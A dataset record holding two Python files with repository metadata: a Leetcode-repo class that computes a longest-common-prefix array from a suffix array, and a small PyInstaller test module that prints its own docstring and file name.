2021-11-01T01:29:38.000Z
|
Extra/lcp.py
|
rampup01/Leetcode
|
8450a95a966ef83b24ffe6450f06ce8de92b3efb
|
[
"MIT"
] | 482
|
2018-06-12T22:16:53.000Z
|
2022-03-29T00:23:29.000Z
|
from suffix_array import SuffixArray
class LCP(object):
def __init__(self, s):
self.s = s
self.lcp_array = []
self.suffix_array = SuffixArray(s)
self.suffix_array.create_suffix_array()
def lcp_w_suffix_str(self):
N = len(self.suffix_array.suffix_array)
array = self.suffix_array.suffix_array
self.lcp_array = [0]*N
inv_suffix = [0]*N
for index in range(N):
inv_suffix[array[index].index] = index
maxLen = 0
for index in range(N):
if inv_suffix[index] == N-1:
maxLen = 0
continue
index_j = array[inv_suffix[index]+1].index
while(index+maxLen < N and index_j+maxLen < N and self.s[index+maxLen] == self.s[index_j+maxLen]):
maxLen += 1
self.lcp_array[inv_suffix[index]] = maxLen
if maxLen > 0:
maxLen -= 1
return self.lcp_array
if __name__ == '__main__':
lcp = LCP("banana")
lcp.lcp_w_suffix_str()
print lcp.lcp_array
| 21.166667
| 101
| 0.685039
|
794e601dee15e42214a3cd408efd0dad6970d9a4
| 609
|
py
|
Python
|
tests/old_suite/basic/pkg1/a.py
|
yoda-vid/pyinstaller
|
419f349dad721a253b19d9c596e251818132d6ba
|
[
"Apache-2.0"
] | 2
|
2017-02-08T22:22:09.000Z
|
2020-10-08T12:28:36.000Z
|
tests/old_suite/basic/pkg1/a.py
|
416426/pyinstaller
|
0f2b2e921433ab5a510c7efdb21d9c1d7cfbc645
|
[
"Apache-2.0"
] | 3
|
2020-04-06T15:48:37.000Z
|
2021-03-23T10:22:21.000Z
|
tests/old_suite/basic/pkg1/a.py
|
416426/pyinstaller
|
0f2b2e921433ab5a510c7efdb21d9c1d7cfbc645
|
[
"Apache-2.0"
] | 4
|
2018-06-04T20:40:37.000Z
|
2020-10-13T22:38:40.000Z
|
#-----------------------------------------------------------------------------
# Copyright (c) 2013-2021, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
""" pkg1.a.py is never imported """
print(" %s" % __doc__)
print(" %s %s" % (__name__, __file__))
| 33.833333
| 78
| 0.538588
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.